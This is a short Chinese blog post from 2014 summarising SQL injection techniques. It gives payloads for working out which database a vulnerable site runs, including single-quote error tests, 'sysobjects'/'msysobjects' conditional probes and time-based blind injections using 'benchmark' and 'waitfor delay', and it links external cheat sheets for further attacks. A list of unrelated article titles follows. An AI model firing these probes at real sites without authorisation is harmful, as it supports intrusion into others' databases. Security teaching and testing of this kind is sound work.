SQL注入攻击技巧总结
2014-03-15 16:00
288 查看
0×01 你要知道目前有哪些数据库
微软公司旗下的:Microsoft SQL server 简称 MS-SQL 或者 SQL SERVER (大型数据库操作,功能和性能异常强大)(一般也是ASP或者ASP.NET)
access,微软Office系列产品之一,极小型数据库。功能和性能当然也是相当一般。性能甚至可以说是相当低(常与ASP应用交互)
Oracle公司旗下的:
MySQL 是一个关系型数据库管理系统(常与PHP web应用交互)
Oracle Database,又名Oracle RDBMS,或简称Oracle。是甲骨文公司的一款关系数据库管理系统
Apache旗下的:
MySql
0×02 判断你的web应用是什么类型的数据库
(在可注入的情况下,判断数据库类型)(我以数字型注入为例子)单引号判断:
id=1′页面出现类似错误显示 “Microsoft JET Database Engine 错误 ’80040e14′” JET 为ACCESS数据库
id=1′页面出现类似错误显示 “Microsoft OLE DB Provider for sql server错误 ‘xxxxxx’ ” 就为MSSQL数据库
条件判断:
id=1 and user>0 出错爆出user用户名的是 MSSQL
如果不爆错,那么我们用以下方式
id=1 and (select count(*) from sysobjects)>0 访回与id=1时页面一样 就为MSSQL数据库
id=1 and (select count(*) from msysobjects)>0 access会返回你没有权限查看
如果也没反应怎么办?
那我们就盲注吧
mysql 盲注语句为 id=1 and if(1=1,benchmark(100,md5(1)),0) //如果可延时执行,为Mysql数据库
mssql 盲注语句为 id=1 and if(1=1) waitfor delay ’00:00:04′;
0×03 针对数据库类型,进行相应的SQL注入攻击
看了下面的文章,你可能知道为什么要分析是web应用是什么数据库啦!如果你分析为 MYSQL 注入,我推荐你看这篇文章。
http://websec.ca/kb/sql_injection#MySQL_Default_Databases
如果你分析为 MSSQL 注入,我推荐你看这篇文章。
http://websec.ca/kb/sql_injection#MSSQL_Default_Databases
如果你分析为 ORACLE 注入,我推荐你看这篇文章。
http://websec.ca/kb/sql_injection#Oracle_Default_Databases
相关文章推荐
- 对WebService的一些封装技巧总结(轉自.net博客園sxwgf的博客)
- 关于Python中空格字符串处理的技巧总结
- 总结PLSQL的快捷键、使用技巧
- 转载:宏定义的一些使用技巧总结
- QT界面(控件)相关设计的一些技巧总结
- C#中WinForm程序退出方法技巧总结
- 常见的浏览器Hack技巧总结
- ASP.NET跨页面传值技巧总结
- 最佳gvim/vim/vi技巧总结
- Oracle SQL性能优化技巧大总结_水
- jquery技巧总结
- 强人总结的Windows XP实用技巧45条(一)
- JS截取与分割字符串常用技巧总结
- 5、Hive的一些技巧总结
- XML五则技巧总结
- iOS开发:XIB使用技巧总结
- c宏定义的技巧总结
- excel操作技巧总结
- iOS开发调试技巧总结
- 各种提权、渗透经验技巧总结大全(下)